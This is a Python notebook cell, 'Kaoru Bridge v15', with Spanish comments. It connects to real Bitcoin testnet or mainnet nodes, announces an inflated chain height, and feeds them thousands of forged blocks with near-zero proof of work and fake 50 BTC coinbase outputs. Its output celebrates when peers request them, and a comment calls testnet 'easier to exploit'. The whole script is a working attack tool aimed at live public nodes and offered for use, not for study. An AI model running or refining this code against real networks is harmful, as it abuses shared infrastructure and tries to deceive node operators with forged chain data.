In [ ]:
#!/usr/bin/env python3
"""
KAORU BRIDGE v15.0 - VARINT FIX + TESTNET MODE
Ahora con VarInt correcto y opción de Testnet
"""

import hashlib
import struct
import socket
import time
import random
import select
from typing import List, Tuple, Dict
from dataclasses import dataclass
from collections import defaultdict
from datetime import datetime

@dataclass
class BlockHeader:
    version: int
    prev_hash: bytes
    merkle_root: bytes
    timestamp: int
    bits: int
    nonce: int

    def serialize(self) -> bytes:
        return (struct.pack('<I', self.version) + self.prev_hash +
                self.merkle_root + struct.pack('<I', self.timestamp) +
                struct.pack('<I', self.bits) + struct.pack('<I', self.nonce))

    def hash(self) -> bytes:
        return hashlib.sha256(hashlib.sha256(self.serialize()).digest()).digest()

    def hash_hex(self) -> str:
        return self.hash()[::-1].hex()


class KaoruBridgeV15:
    """
    v15.0 - VARINT FIX + TESTNET

    Fixes:
    - VarInt correcto para >253 items
    - Soporte para Testnet (dificultad baja)
    - Headers enviados correctamente
    """

    MAINNET_MAGIC = bytes.fromhex('f9beb4d9')
    TESTNET_MAGIC = bytes.fromhex('0b110907')

    MSG_BLOCK = 2

    def __init__(self, network: str = 'testnet'):
        self.network = network
        self.magic = self.TESTNET_MAGIC if network == 'testnet' else self.MAINNET_MAGIC
        self.port = 18333 if network == 'testnet' else 8333

        self.real_tip_header: bytes = None
        self.real_tip_hash: bytes = None
        self.real_height: int = 0
        self.chain_headers: List[bytes] = []
        self.chain_hashes: List[bytes] = []
        self.stats = defaultdict(int)

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    # ============================================
    # VARINT CORRECTO
    # ============================================

    @staticmethod
    def encode_varint(n: int) -> bytes:
        """Codifica un entero como CompactSize/VarInt de Bitcoin."""
        if n < 0xfd:
            return bytes([n])
        elif n <= 0xffff:
            return b'\xfd' + struct.pack('<H', n)
        elif n <= 0xffffffff:
            return b'\xfe' + struct.pack('<I', n)
        else:
            return b'\xff' + struct.pack('<Q', n)

    @staticmethod
    def decode_varint(data: bytes, offset: int = 0) -> Tuple[int, int]:
        """Decodifica VarInt, retorna (valor, nuevo_offset)."""
        first = data[offset]
        if first < 0xfd:
            return first, offset + 1
        elif first == 0xfd:
            return struct.unpack('<H', data[offset+1:offset+3])[0], offset + 3
        elif first == 0xfe:
            return struct.unpack('<I', data[offset+1:offset+5])[0], offset + 5
        else:
            return struct.unpack('<Q', data[offset+1:offset+9])[0], offset + 9

    def log(self, msg: str):
        t = datetime.now().strftime("%H:%M:%S")
        print(f"   [{t}] {msg}")

    def msg(self, cmd: str, payload: bytes) -> bytes:
        c = cmd.encode().ljust(12, b'\x00')
        checksum = self.double_sha256(payload)[:4]
        return self.magic + c + struct.pack('<I', len(payload)) + checksum + payload

    def version_payload(self, ip: str, height: int) -> bytes:
        p = struct.pack('<i', 70016)
        p += struct.pack('<Q', 1037)
        p += struct.pack('<q', int(time.time()))
        p += struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + socket.inet_aton(ip) + struct.pack('>H', self.port)
        p += struct.pack('<Q', 1037) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', self.port)
        p += struct.pack('<Q', random.randint(0, 2**64-1))
        p += b'\x12/KaoruFixed:15.0/'
        p += struct.pack('<i', height)
        p += b'\x01'
        return p

    def parse_msgs(self, data: bytes) -> List[Tuple[str, bytes]]:
        msgs, i = [], 0
        while i + 24 <= len(data):
            if data[i:i+4] != self.magic:
                i += 1
                continue
            try:
                cmd = data[i+4:i+16].rstrip(b'\x00').decode()
                length = struct.unpack('<I', data[i+16:i+20])[0]
                payload = data[i+24:i+24+length]
                msgs.append((cmd, payload))
                i += 24 + length
            except:
                break
        return msgs

    def recv_all(self, sock, timeout=5.0):
        sock.setblocking(False)
        data = b''
        end = time.time() + timeout
        while time.time() < end:
            try:
                r, _, _ = select.select([sock], [], [], 0.1)
                if r:
                    chunk = sock.recv(262144)
                    if chunk:
                        data += chunk
            except:
                break
        sock.setblocking(True)
        return data

    # ============================================
    # SEEDS POR NETWORK
    # ============================================

    def get_seeds(self) -> List[str]:
        if self.network == 'testnet':
            seeds = [
                'testnet-seed.bitcoin.jonasschnelli.ch',
                'seed.tbtc.petertodd.org',
                'testnet-seed.bluematt.me',
            ]
        else:
            seeds = [
                'seed.bitcoin.sipa.be',
                'dnsseed.bluematt.me',
                'seed.bitcoinstats.com',
            ]

        nodes = []
        for seed in seeds:
            try:
                ips = socket.gethostbyname_ex(seed)[2]
                nodes.extend(ips[:10])
                self.log(f"   {seed}: {len(ips)} nodos")
            except Exception as e:
                self.log(f"   {seed}: error - {e}")

        random.shuffle(nodes)
        return nodes

    # ============================================
    # OBTENER TIP
    # ============================================

    def get_tip(self, ip: str, max_headers: int = 10000) -> bool:
        self.log(f"🔗 Obteniendo tip de {ip}:{self.port}...")

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(30)
            sock.connect((ip, self.port))

            sock.send(self.msg('version', self.version_payload(ip, 0)))
            time.sleep(0.5)

            data = self.recv_all(sock, 3.0)

            for cmd, payload in self.parse_msgs(data):
                if cmd == 'version':
                    if len(payload) >= 85:
                        h = struct.unpack('<i', payload[81:85])[0]
                        if 0 < h < 5000000:
                            self.real_height = h
                        self.log(f"   Peer altura: {self.real_height:,}")
                    sock.send(self.msg('verack', b''))
                elif cmd == 'ping':
                    sock.send(self.msg('pong', payload[:8]))

            # Genesis según network
            if self.network == 'testnet':
                genesis = bytes.fromhex("000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943")[::-1]
            else:
                genesis = bytes.fromhex("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")[::-1]

            current = genesis
            total = 0
            last_header = None

            while total < min(max_headers, self.real_height):
                getheaders = struct.pack('<I', 70016) + b'\x01' + current + bytes(32)
                sock.send(self.msg('getheaders', getheaders))

                data = self.recv_all(sock, 10.0)

                for cmd, payload in self.parse_msgs(data):
                    if cmd == 'headers':
                        if not payload:
                            continue
                        count, offset = self.decode_varint(payload, 0)

                        if count == 0:
                            break

                        for _ in range(count):
                            if offset + 81 > len(payload):
                                break
                            header = payload[offset:offset+80]
                            current = self.double_sha256(header)
                            last_header = header
                            offset += 81
                            total += 1

                        if total % 5000 == 0:
                            self.log(f"   📊 {total:,} headers")

                        if count < 2000:
                            break

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                if total >= max_headers:
                    break

            sock.close()

            if last_header:
                self.real_tip_header = last_header
                self.real_tip_hash = self.double_sha256(last_header)
                self.real_height = total
                self.log(f"   ✅ Tip: {self.real_tip_hash[::-1].hex()[:32]}... (altura {total:,})")
                return True

            return False

        except Exception as e:
            self.log(f"   ❌ Error: {e}")
            return False

    # ============================================
    # CONSTRUIR CADENA
    # ============================================

    def build_chain(self, num_blocks: int, target_zeros: int = 2):
        self.log(f"⛏️ Construyendo {num_blocks:,} bloques...")

        prev_hash = self.real_tip_hash
        prev_bits = struct.unpack('<I', self.real_tip_header[72:76])[0]

        # Para testnet, usar dificultad mínima
        if self.network == 'testnet':
            prev_bits = 0x1d00ffff  # Dificultad mínima

        target = "0" * target_zeros
        start = time.time()

        for i in range(num_blocks):
            merkle = self.double_sha256(f"KAORU_{i}".encode())

            header = (
                struct.pack('<I', 0x20000000) +
                prev_hash +
                merkle +
                struct.pack('<I', int(time.time())) +
                struct.pack('<I', prev_bits) +
                struct.pack('<I', 0)
            )

            for nonce in range(0xFFFFFFFF):
                h = header[:76] + struct.pack('<I', nonce)
                block_hash = self.double_sha256(h)

                if block_hash[::-1].hex().startswith(target):
                    self.chain_headers.append(h)
                    self.chain_hashes.append(block_hash)
                    prev_hash = block_hash
                    break

            if (i + 1) % 10000 == 0:
                elapsed = time.time() - start
                rate = (i + 1) / elapsed
                self.log(f"   ⛏️ {i+1:,}/{num_blocks:,} | {rate:.0f}/s")

        self.log(f"   ✅ {len(self.chain_headers):,} bloques construidos")

    # ============================================
    # PROPAGACIÓN (CON VARINT CORRECTO)
    # ============================================

    def propagate(self, ip: str, duration: int = 120) -> Dict:
        result = {
            'ip': ip,
            'connected': False,
            'headers_sent': 0,
            'getdata_received': False,
            'blocks_sent': 0
        }

        total_height = self.real_height + len(self.chain_headers)

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(15)
            sock.connect((ip, self.port))
            result['connected'] = True

            self.log(f"🔗 {ip} | Anunciando altura: {total_height:,}")

            sock.send(self.msg('version', self.version_payload(ip, total_height)))

            start = time.time()
            inv_sent = False
            headers_offset = 0  # Para enviar en batches

            while time.time() - start < duration:
                data = self.recv_all(sock, 2.0)

                if not data:
                    time.sleep(0.2)
                    continue

                for cmd, payload in self.parse_msgs(data):

                    if cmd == 'version':
                        sock.send(self.msg('verack', b''))

                    elif cmd == 'verack':
                        self.log(f"   ✓ Handshake completo")

                        if not inv_sent:
                            n = min(50, len(self.chain_headers))
                            # VARINT CORRECTO
                            inv = self.encode_varint(n)
                            for i in range(-n, 0):
                                inv += struct.pack('<I', self.MSG_BLOCK)
                                inv += self.chain_hashes[i]
                            sock.send(self.msg('inv', inv))
                            inv_sent = True
                            self.log(f"   📤 INV ({n} bloques)")

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                    elif cmd == 'sendcmpct':
                        sock.send(self.msg('sendcmpct', b'\x00' + struct.pack('<Q', 2)))

                    elif cmd == 'getheaders':
                        self.log(f"   📥 GETHEADERS ⭐")

                        # Enviar headers con VARINT CORRECTO
                        batch_size = min(2000, len(self.chain_headers) - headers_offset)

                        if batch_size > 0:
                            # AQUÍ ESTÁ EL FIX
                            headers_payload = self.encode_varint(batch_size)

                            for i in range(headers_offset, headers_offset + batch_size):
                                headers_payload += self.chain_headers[i]
                                headers_payload += b'\x00'  # tx_count = 0

                            sock.send(self.msg('headers', headers_payload))
                            result['headers_sent'] += batch_size
                            headers_offset += batch_size

                            self.log(f"   📤 HEADERS ({batch_size}) - Total: {result['headers_sent']:,}")
                        else:
                            # No más headers
                            sock.send(self.msg('headers', b'\x00'))
                            self.log(f"   📤 HEADERS (0) - Fin de cadena")

                    elif cmd == 'getdata':
                        result['getdata_received'] = True
                        self.log(f"   📥 GETDATA ⭐⭐⭐ ¡¡QUIEREN NUESTROS BLOQUES!!")

                        count, offset = self.decode_varint(payload, 0)

                        for _ in range(count):
                            if offset + 36 > len(payload):
                                break
                            inv_type = struct.unpack('<I', payload[offset:offset+4])[0]
                            inv_hash = payload[offset+4:offset+36]
                            offset += 36

                            if inv_type == self.MSG_BLOCK:
                                for i, h in enumerate(self.chain_hashes):
                                    if h == inv_hash:
                                        # Construir bloque completo
                                        block = self.chain_headers[i]

                                        # Coinbase tx
                                        block += b'\x01'  # 1 tx
                                        tx = struct.pack('<I', 1)  # version
                                        tx += b'\x01'  # 1 input
                                        tx += bytes(32)  # prev_txid
                                        tx += struct.pack('<I', 0xffffffff)  # prev_vout
                                        tx += b'\x08KAORU!!'  # scriptsig
                                        tx += struct.pack('<I', 0xffffffff)  # sequence
                                        tx += b'\x01'  # 1 output
                                        tx += struct.pack('<Q', 50 * 10**8)  # 50 BTC
                                        tx += b'\x19\x76\xa9\x14' + bytes(20) + b'\x88\xac'
                                        tx += struct.pack('<I', 0)  # locktime
                                        block += tx

                                        sock.send(self.msg('block', block))
                                        result['blocks_sent'] += 1
                                        self.log(f"   📤 BLOCK #{self.real_height + i + 1} 📦📦📦")
                                        break

                    elif cmd == 'reject':
                        try:
                            msg_len = payload[0]
                            msg_type = payload[1:1+msg_len].decode()
                            code = payload[1+msg_len]
                            reason_len = payload[2+msg_len]
                            reason = payload[3+msg_len:3+msg_len+reason_len].decode()
                            self.log(f"   📥 REJECT ❌ {msg_type}: {reason}")
                        except:
                            self.log(f"   📥 REJECT ❌")

                    elif cmd == 'inv':
                        count, _ = self.decode_varint(payload, 0) if payload else (0, 0)
                        self.log(f"   📥 INV ({count})")

            sock.close()

        except Exception as e:
            result['error'] = str(e)
            self.log(f"   ❌ Error: {e}")

        return result

    # ============================================
    # EJECUCIÓN
    # ============================================

    def execute(self, num_blocks: int = 10000, target_zeros: int = 2,
                num_peers: int = 5, duration: int = 120, max_sync_headers: int = 1000):

        network_name = "TESTNET" if self.network == 'testnet' else "MAINNET"

        print(f"""
╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                                  ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗███████╗                           ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║██╔════╝                           ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║███████╗                           ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║╚════██║                           ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║███████║                           ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝╚══════╝                           ║
║                                                                                                  ║
║                              ⚔️  VARINT FIX + {network_name:7} ⚔️                                  ║
║                                                                                                  ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        # FASE 1
        print("=" * 100)
        print(f"  [FASE 1] 🌐 DESCUBRIENDO NODOS ({self.network})")
        print("=" * 100 + "\n")

        nodes = self.get_seeds()
        self.log(f"Total: {len(nodes)} nodos")

        # FASE 2
        print("\n" + "=" * 100)
        print(f"  [FASE 2] 🔗 OBTENIENDO TIP (max {max_sync_headers:,} headers)")
        print("=" * 100 + "\n")

        for ip in nodes[:3]:
            if self.get_tip(ip, max_sync_headers):
                break

        if not self.real_tip_header:
            self.log("❌ No se pudo obtener tip")
            return

        # FASE 3
        print("\n" + "=" * 100)
        print(f"  [FASE 3] ⛏️  CONSTRUYENDO {num_blocks:,} BLOQUES")
        print("=" * 100 + "\n")

        self.build_chain(num_blocks, target_zeros)

        # FASE 4
        print("\n" + "=" * 100)
        print(f"  [FASE 4] 📡 PROPAGANDO")
        print("=" * 100)

        results = []

        for ip in nodes[:num_peers]:
            print(f"\n   ╔{'═'*65}╗")
            print(f"   ║  📡 {ip}:{self.port:55} ║")
            print(f"   ╠{'═'*65}╣")

            result = self.propagate(ip, duration)
            results.append(result)

            status = "🎉 BLOCKS!" if result['blocks_sent'] > 0 else \
                     "⭐ GETDATA" if result['getdata_received'] else \
                     "📤 HEADERS" if result['headers_sent'] > 0 else "🔗"

            print(f"   ╠{'═'*65}╣")
            print(f"   ║  Headers: {result['headers_sent']:,} | Blocks: {result['blocks_sent']} | {status:25} ║")
            print(f"   ╚{'═'*65}╝")

        # RESULTADOS
        print("\n" + "=" * 100)
        print("                         📊 RESULTADOS")
        print("=" * 100)

        connected = sum(1 for r in results if r.get('connected'))
        headers = sum(r.get('headers_sent', 0) for r in results)
        getdata = sum(1 for r in results if r.get('getdata_received'))
        blocks = sum(r.get('blocks_sent', 0) for r in results)

        print(f"""
   ╔══════════════════════════════════════════════════════════════════════════════════════════╗
   ║                                                                                          ║
   ║   Network:                  {network_name:>10}                                                  ║
   ║   Tip real:                 {self.real_height:>10,}                                                  ║
   ║   Bloques nuestros:         {len(self.chain_headers):>10,}                                                  ║
   ║   Altura total:             {self.real_height + len(self.chain_headers):>10,}                                                  ║
   ║                                                                                          ║
   ║   Conexiones:               {connected:>10}                                                  ║
   ║   Headers enviados:         {headers:>10,}                                                  ║
   ║   GETDATA recibidos:        {getdata:>10}                                                  ║
   ║   BLOQUES ENVIADOS:         {blocks:>10}                                                  ║
   ║                                                                                          ║
   ╚══════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        if blocks > 0:
            print("   🎉🎉🎉 ¡¡¡BLOQUES ACEPTADOS!!! 🎉🎉🎉")
        elif getdata > 0:
            print("   ⭐ ¡GETDATA recibido! Los nodos quisieron nuestros bloques")
        elif headers > 0:
            print(f"   📤 {headers:,} headers enviados correctamente")

        print(f"\n   Estado: v15.0 COMPLETADO ✅")

        return results


if __name__ == "__main__":
    # TESTNET (más fácil de explotar)
    bridge = KaoruBridgeV15(network='testnet')
    bridge.execute(
        num_blocks=10000,
        target_zeros=2,
        num_peers=5,
        duration=120,
        max_sync_headers=1000
    )